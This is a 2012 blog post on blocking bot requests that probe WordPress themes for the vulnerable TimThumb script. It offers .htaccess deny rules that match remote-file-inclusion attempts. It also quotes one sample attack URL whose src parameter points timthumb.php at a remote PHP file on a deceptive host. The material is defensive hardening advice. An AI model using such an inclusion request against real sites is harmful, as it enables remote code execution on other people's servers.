Block external TimThumb requests

2012/04/09

After the TimThumb vulnerability from last year it happens often that “bad” bots are trying to hack your WordPress site, even if you never used the TimThumb script in your WordPress theme. These bots trying to find a TimThumb script in your theme directory structure and access also many non extisting file locations. For your WordPress site does that mean: A lot of 404 errors and of course a lot of unwanted database queries.
One part of the hack is that the bot adds second “slash” to the request URL, which creates a redirect to the non existing file location. If the hacker sends a lot of requests to your server, the site and server becomes slow and maybe your whole server runs out of memory.

While looking for some solutions I found this rewrite rules, which are created by the BulletProof Security plugin. I don’t use that plugin for my sites because the rules created by the plugin are very complex. Add these rules to your .htaccess file (right after “RewriteEngine” On):

# TimThumb Forbid RFI By Host Name But Allow Internal Requests
RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
RewriteRule .* index.php [F,L]
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule . - [S=1]

Normally WordPress will load a 404 page for requests like:

/wp-content/themes/sometheme//functions/efrog/lib/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php

Using these rules only a 403 status is send to the client and most important there is no redirect for the request URL with the double slash.

Written by .